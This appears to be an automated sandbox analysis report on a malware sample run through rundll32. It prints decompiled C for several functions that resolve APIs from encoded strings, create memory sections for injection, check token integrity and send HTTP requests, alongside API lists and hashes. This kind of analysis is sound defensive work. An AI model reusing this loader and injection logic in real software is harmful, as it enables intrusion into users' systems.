                                            Similarity
                                            • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                                            • String ID:
                                            • API String ID: 3901270786-0
                                            • Opcode ID: e4d0381faaa3558b871dfff282a9859ec40d8b3fdccf0398e3db1839486aa746
                                            • Instruction ID: ef56bab88b92d7b4be6f264d3d25ba7c93798feea5e47afbdbd7ed5747d3204f
                                            • Opcode Fuzzy Hash: e4d0381faaa3558b871dfff282a9859ec40d8b3fdccf0398e3db1839486aa746
                                            • Instruction Fuzzy Hash: E6315B71608311ABD721CE11D844B2BBBEDFB88B54F110919FC85A6290DB74ED44CBAE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F2384 Relevance: 10.6, APIs: 7, Instructions: 109librarymemoryloaderCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 73%
                                            			E049F2384(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E049F74E0(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E049F799E( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x49fa300 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x49fa348; // 0x57d5a8
					_t18 = _t47 + 0x49fb3e6; // 0x73797325
					_t68 = E049F50E8(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x49fa348; // 0x57d5a8
						_t19 = _t50 + 0x49fb747; // 0x4f78cef
						_t20 = _t50 + 0x49fb0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E049F37E9();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed
							_push(1);
							E049F37E9();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								FindCloseChangeNotification(_v28); // executed
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x49fa2d8, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E049F4C73(_t70);
				goto L12;
			}


















                                            0x049f238c
                                            0x049f238c
                                            0x049f239b
                                            0x049f23a2
                                            0x049f23a7
                                            0x049f24b4
                                            0x049f24bb
                                            0x049f24bb
                                            0x049f23b6
                                            0x049f23be
                                            0x049f23c1
                                            0x049f23c6
                                            0x049f23db
                                            0x049f23e1
                                            0x049f23e2
                                            0x049f23e5
                                            0x049f23eb
                                            0x049f23ee
                                            0x049f23f3
                                            0x049f23fb
                                            0x049f2407
                                            0x049f240b
                                            0x049f249b
                                            0x049f2411
                                            0x049f2411
                                            0x049f2416
                                            0x049f241d
                                            0x049f2431
                                            0x049f2435
                                            0x049f2484
                                            0x049f2437
                                            0x049f2438
                                            0x049f243f
                                            0x049f2458
                                            0x049f245a
                                            0x049f245e
                                            0x049f2465
                                            0x049f247f
                                            0x049f2467
                                            0x049f2470
                                            0x049f2475
                                            0x049f2475
                                            0x049f2465
                                            0x049f2493
                                            0x049f2493
                                            0x049f240b
                                            0x049f24a2
                                            0x049f24ab
                                            0x049f24af
                                            0x00000000

                                            APIs
                                              • Part of subcall function 049F74E0: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,049F23A0,?,?,?,?,00000000,00000000), ref: 049F7505
                                              • Part of subcall function 049F74E0: GetProcAddress.KERNEL32(00000000,7243775A), ref: 049F7527
                                              • Part of subcall function 049F74E0: GetProcAddress.KERNEL32(00000000,614D775A), ref: 049F753D
                                              • Part of subcall function 049F74E0: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 049F7553
                                              • Part of subcall function 049F74E0: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 049F7569
                                              • Part of subcall function 049F74E0: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 049F757F
                                            • memset.NTDLL ref: 049F23EE
                                              • Part of subcall function 049F50E8: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,049F2407,73797325), ref: 049F50F9
                                              • Part of subcall function 049F50E8: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 049F5113
                                            • GetModuleHandleA.KERNEL32(4E52454B,04F78CEF,73797325), ref: 049F2424
                                            • GetProcAddress.KERNEL32(00000000), ref: 049F242B
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 049F2493
                                              • Part of subcall function 049F37E9: GetProcAddress.KERNEL32(36776F57,049F3ECD), ref: 049F3804
                                            • FindCloseChangeNotification.KERNEL32(00000000,00000001), ref: 049F2470
                                            • CloseHandle.KERNEL32(?), ref: 049F2475
                                            • GetLastError.KERNEL32(00000001), ref: 049F2479
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ChangeErrorFindFreeHeapLastNotificationmemset
                                            • String ID:
                                            • API String ID: 186216982-0
                                            • Opcode ID: 9ec32cdd7f2ae9b01a0273a69cd8a06fe066970650fae7784c474d6b50e3c209
                                            • Instruction ID: 0432185152e67e0fea9db8571276c27e49fc40777087f7e8c9e305f33b59b22f
                                            • Opcode Fuzzy Hash: 9ec32cdd7f2ae9b01a0273a69cd8a06fe066970650fae7784c474d6b50e3c209
                                            • Instruction Fuzzy Hash: EE313CB2900209AFDB10EFA4CC88E9EBFBCEB48358F1444B5EA05A7111D775AD45DB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05818F9E Relevance: 10.6, APIs: 7, Instructions: 84sleepthreadCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0581CC5D: memset.NTDLL ref: 0581CC67
                                            • OpenEventA.KERNEL32(00000002,00000000,05829314,?,00000000,00000000,?,05816085,?,?,?,?,?,?,?,0580BF69), ref: 05819038
                                            • SetEvent.KERNEL32(00000000,?,05816085,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 05819045
                                            • Sleep.KERNEL32(00000BB8,?,05816085,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 05819050
                                            • ResetEvent.KERNEL32(00000000,?,05816085,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 05819057
                                            • CloseHandle.KERNEL32(00000000,?,05816085,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 0581905E
                                            • GetShellWindow.USER32 ref: 05819069
                                            • GetWindowThreadProcessId.USER32(00000000), ref: 05819070
                                              • Part of subcall function 058050FB: RegCloseKey.ADVAPI32(?,?,?), ref: 0580517E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                                            • String ID:
                                            • API String ID: 53838381-0
                                            • Opcode ID: b3a97f1b8919a8cc9ffd7c6073df49215459f6f83fa1daebf73eeb6d7853df8d
                                            • Instruction ID: 0411a55cf13dfc48e01f7a7bab81fd596082da31cce7900af1ff366f8df6585f
                                            • Opcode Fuzzy Hash: b3a97f1b8919a8cc9ffd7c6073df49215459f6f83fa1daebf73eeb6d7853df8d
                                            • Instruction Fuzzy Hash: 85216272314210ABC63166AAEC4EE6B7F6DABC9A10F01C405FD0AC7150DF356C418BBA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F7628 Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E049F7628(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x49fa2fc > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E049F4DF6(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E049F4C73(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                            0x049f7635
                                            0x049f763c
                                            0x049f7643
                                            0x049f7657
                                            0x049f7662
                                            0x049f767a
                                            0x049f7687
                                            0x049f768a
                                            0x049f768f
                                            0x049f769a
                                            0x049f769e
                                            0x049f76ad
                                            0x049f76b1
                                            0x049f76cd
                                            0x049f76cd
                                            0x049f76d1
                                            0x049f76d1
                                            0x049f76d6
                                            0x049f76da
                                            0x049f76e0
                                            0x049f76e1
                                            0x049f76e8
                                            0x049f76ee

                                            APIs
                                            • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 049F765A
                                            • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 049F767A
                                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 049F768A
                                            • CloseHandle.KERNEL32(00000000), ref: 049F76DA
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 049F76AD
                                            • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 049F76B5
                                            • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 049F76C5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                            • String ID:
                                            • API String ID: 1295030180-0
                                            • Opcode ID: aa373d02d35a8766f4fbc9a543013679f59472d17857a5b5fe5edd118ba63c02
                                            • Instruction ID: 81e9d4edfa4af6e5b871e64bed65ab571061fc6014c1c0894068de4739cf44cd
                                            • Opcode Fuzzy Hash: aa373d02d35a8766f4fbc9a543013679f59472d17857a5b5fe5edd118ba63c02
                                            • Instruction Fuzzy Hash: 22212875900209BFEB10AF94DD84EEEBFBDEB49344F1000B5EA10A6260D7756E54EB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F3739 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 64%
                                            			E049F3739(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x49fa348; // 0x57d5a8
				_t1 = _t9 + 0x49fb62c; // 0x253d7325
				_t36 = 0;
				_t28 = E049F403D(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t40 = E049F4DF6(_v8 +  *_t39(_a4) + 1);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E049F723B(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E049F4C73(_t40);
						_t42 = E049F20D2(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E049F4C73(_t36);
							_t36 = _t42;
						}
						_t43 = E049F72E7(_t36, _t33);
						if(_t43 != 0) {
							E049F4C73(_t36);
							_t36 = _t43;
						}
					}
					E049F4C73(_t28);
				}
				return _t36;
			}
















                                            0x049f3739
                                            0x049f373c
                                            0x049f373d
                                            0x049f3744
                                            0x049f374b
                                            0x049f3752
                                            0x049f3756
                                            0x049f375d
                                            0x049f3764
                                            0x049f3769
                                            0x049f377b
                                            0x049f377f
                                            0x049f3783
                                            0x049f3789
                                            0x049f378e
                                            0x049f3798
                                            0x049f379e
                                            0x049f37a0
                                            0x049f37b7
                                            0x049f37bb
                                            0x049f37be
                                            0x049f37c3
                                            0x049f37c3
                                            0x049f37cc
                                            0x049f37d0
                                            0x049f37d3
                                            0x049f37d8
                                            0x049f37d8
                                            0x049f37d0
                                            0x049f37db
                                            0x049f37e0
                                            0x049f37e6

                                            APIs
                                              • Part of subcall function 049F403D: lstrlen.KERNEL32(00000000,00000000,00000000,75BCC740,?,?,?,049F3752,253D7325,00000000,75BCC740,?,?,049F653D,?,04F795B0), ref: 049F40A4
                                              • Part of subcall function 049F403D: sprintf.NTDLL ref: 049F40C5
                                            • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,75BCC740,?,?,049F653D,?,04F795B0), ref: 049F3764
                                            • lstrlen.KERNEL32(?,?,?,049F653D,?,04F795B0), ref: 049F376C
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            • strcpy.NTDLL ref: 049F3783
                                            • lstrcat.KERNEL32(00000000,?), ref: 049F378E
                                              • Part of subcall function 049F723B: lstrlen.KERNEL32(?,?,?,00000000,?,049F379D,00000000,?,?,?,049F653D,?,04F795B0), ref: 049F724C
                                              • Part of subcall function 049F4C73: RtlFreeHeap.NTDLL(00000000,00000000,049F55C4,00000000,?,?,00000000), ref: 049F4C7F
                                            • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,049F653D,?,04F795B0), ref: 049F37AB
                                              • Part of subcall function 049F20D2: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,049F37B7,00000000,?,?,049F653D,?,04F795B0), ref: 049F20DC
                                              • Part of subcall function 049F20D2: _snprintf.NTDLL ref: 049F213A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                            • String ID: =
                                            • API String ID: 2864389247-1428090586
                                            • Opcode ID: 0d82541e2455ba97d017356558c65b277c8967446ebb1dc08ff4b0fa77e4cdf8
                                            • Instruction ID: 55caa5826dec43b41252465517c273d7af3be253c284fdf6e59c59c3479f396c
                                            • Opcode Fuzzy Hash: 0d82541e2455ba97d017356558c65b277c8967446ebb1dc08ff4b0fa77e4cdf8
                                            • Instruction Fuzzy Hash: 8B11E3739055242757226BB89C84CEF3A9C9ED46683050131FF00A7200DF78FD0187A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F3C00 Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 049F1162: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,04F789D8,049F3C2E,?,?,?,?,?,?,?,?,?,?,?,049F3C2E), ref: 049F122F
                                              • Part of subcall function 049F6615: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 049F6652
                                              • Part of subcall function 049F6615: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 049F6683
                                            • SysAllocString.OLEAUT32(00000000), ref: 049F3C5A
                                            • SysAllocString.OLEAUT32(0070006F), ref: 049F3C6E
                                            • SysAllocString.OLEAUT32(00000000), ref: 049F3C80
                                            • SysFreeString.OLEAUT32(00000000), ref: 049F3CE8
                                            • SysFreeString.OLEAUT32(00000000), ref: 049F3CF7
                                            • SysFreeString.OLEAUT32(00000000), ref: 049F3D02
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                                            • String ID:
                                            • API String ID: 2831207796-0
                                            • Opcode ID: 3315dfccd5fc146b6d77fe2f939eac59ec244ffe502453ebaa5df1f456c16e21
                                            • Instruction ID: ef83f9767da0f8bc892074376b4cc982df8407e0c5a67e86f246464c6de009f1
                                            • Opcode Fuzzy Hash: 3315dfccd5fc146b6d77fe2f939eac59ec244ffe502453ebaa5df1f456c16e21
                                            • Instruction Fuzzy Hash: FE414F36900609AFDB11DFB8D844A9EB7BAEF89300F144436EE14EB220DA75AD05CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581FAF2 Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLastError.KERNEL32(00000000,?,?,?,00000000,058250B8,00000018,0580309A,00000000,?,?,?,?,00000000), ref: 0581FB35
                                            • VirtualProtect.KERNEL32(00000000,00000004,00000000,00000000,00000000,00000004,00000000,?,00000000,?,?,?,00000000,058250B8,00000018,0580309A), ref: 0581FBC0
                                            • RtlEnterCriticalSection.NTDLL(05829420), ref: 0581FBE9
                                            • RtlLeaveCriticalSection.NTDLL(05829420), ref: 0581FC07
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                                            • String ID:
                                            • API String ID: 3666628472-0
                                            • Opcode ID: 1cfa50851ba34a68d7cc4911e768844e24bd52c48c905a07e978adb3d2bfca4b
                                            • Instruction ID: 669d827a9267be1d7c8a14cb6e6797b9bfb1847b4e352b78b8a7ace2e4eb00db
                                            • Opcode Fuzzy Hash: 1cfa50851ba34a68d7cc4911e768844e24bd52c48c905a07e978adb3d2bfca4b
                                            • Instruction Fuzzy Hash: 76415971A00719AFCB21DF65C888999BFF9FF48300B008529ED16D7260D734AD91CFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F74E0 Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E049F74E0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E049F4DF6(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x49fa348; // 0x57d5a8
					_t1 = _t23 + 0x49fb11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x49fa348; // 0x57d5a8
					_t2 = _t26 + 0x49fb769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E049F4C73(_t54);
					} else {
						_t30 =  *0x49fa348; // 0x57d5a8
						_t5 = _t30 + 0x49fb756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x49fa348; // 0x57d5a8
							_t7 = _t33 + 0x49fb40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x49fa348; // 0x57d5a8
								_t9 = _t36 + 0x49fb4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x49fa348; // 0x57d5a8
									_t11 = _t39 + 0x49fb779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E049F25D7(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                            0x049f74ef
                                            0x049f74f3
                                            0x049f75b5
                                            0x049f74f9
                                            0x049f74f9
                                            0x049f74fe
                                            0x049f7511
                                            0x049f7513
                                            0x049f7518
                                            0x049f7520
                                            0x049f7527
                                            0x049f7529
                                            0x049f752e
                                            0x049f75ad
                                            0x049f75ae
                                            0x049f7530
                                            0x049f7530
                                            0x049f7535
                                            0x049f753d
                                            0x049f753f
                                            0x049f7544
                                            0x00000000
                                            0x049f7546
                                            0x049f7546
                                            0x049f754b
                                            0x049f7553
                                            0x049f7555
                                            0x049f755a
                                            0x00000000
                                            0x049f755c
                                            0x049f755c
                                            0x049f7561
                                            0x049f7569
                                            0x049f756b
                                            0x049f7570
                                            0x00000000
                                            0x049f7572
                                            0x049f7572
                                            0x049f7577
                                            0x049f757f
                                            0x049f7581
                                            0x049f7586
                                            0x00000000
                                            0x049f7588
                                            0x049f758e
                                            0x049f7593
                                            0x049f759a
                                            0x049f759f
                                            0x049f75a4
                                            0x00000000
                                            0x049f75a6
                                            0x049f75a9
                                            0x049f75a9
                                            0x049f75a4
                                            0x049f7586
                                            0x049f7570
                                            0x049f755a
                                            0x049f7544
                                            0x049f752e
                                            0x049f75c3

                                            APIs
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,049F23A0,?,?,?,?,00000000,00000000), ref: 049F7505
                                            • GetProcAddress.KERNEL32(00000000,7243775A), ref: 049F7527
                                            • GetProcAddress.KERNEL32(00000000,614D775A), ref: 049F753D
                                            • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 049F7553
                                            • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 049F7569
                                            • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 049F757F
                                              • Part of subcall function 049F25D7: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000,049F759F), ref: 049F2634
                                              • Part of subcall function 049F25D7: memset.NTDLL ref: 049F2656
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                            • String ID:
                                            • API String ID: 3012371009-0
                                            • Opcode ID: ff28106a050fe6cc29caaad46bc229a53a3b4e259fd1e3dc4f6b04609a74e1d5
                                            • Instruction ID: 5185c4d4a8a142d7fbd32f6b1d6de7fea7a5a88b7bdfd3cfed3b63ee7c18429c
                                            • Opcode Fuzzy Hash: ff28106a050fe6cc29caaad46bc229a53a3b4e259fd1e3dc4f6b04609a74e1d5
                                            • Instruction Fuzzy Hash: F921EBB161070AAFEB10EFA9CC84E6ABBFCEF447547154476EA15C7221E7B4F9048B60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F4BD6 Relevance: 9.0, APIs: 6, Instructions: 45networkCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E049F4BD6(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0) {
					_t9 = E049F5296(__eax + 4, _t18, _a4, __eax, __eax + 4); // executed
					if(_t9 == 0) {
						L9:
						return GetLastError();
					}
				}
				_t10 = E049F7A71(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                            0x049f4bd6
                                            0x049f4be3
                                            0x049f4be5
                                            0x049f4bf0
                                            0x049f4bf7
                                            0x049f4c48
                                            0x00000000
                                            0x049f4c48
                                            0x049f4bf7
                                            0x049f4bfd
                                            0x049f4c04
                                            0x049f4c10
                                            0x049f4c15
                                            0x049f4c2b
                                            0x049f4c3b
                                            0x00000000
                                            0x049f4c2d
                                            0x049f4c2d
                                            0x049f4c34
                                            0x049f4c41
                                            0x049f4c41
                                            0x049f4c41
                                            0x049f4c34
                                            0x049f4c2b
                                            0x049f4c46
                                            0x00000000
                                            0x00000000
                                            0x049f4c4c

                                            APIs
                                            • ResetEvent.KERNEL32(?,00000008,?,?,00000102,049F5388,?,?,00000000,00000000), ref: 049F4C10
                                            • ResetEvent.KERNEL32(?), ref: 049F4C15
                                            • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 049F4C22
                                            • GetLastError.KERNEL32 ref: 049F4C2D
                                            • GetLastError.KERNEL32(?,?,00000102,049F5388,?,?,00000000,00000000), ref: 049F4C48
                                              • Part of subcall function 049F5296: lstrlen.KERNEL32(00000000,00000008,?,76C84D40,?,?,049F4BF5,?,?,?,?,00000102,049F5388,?,?,00000000), ref: 049F52A2
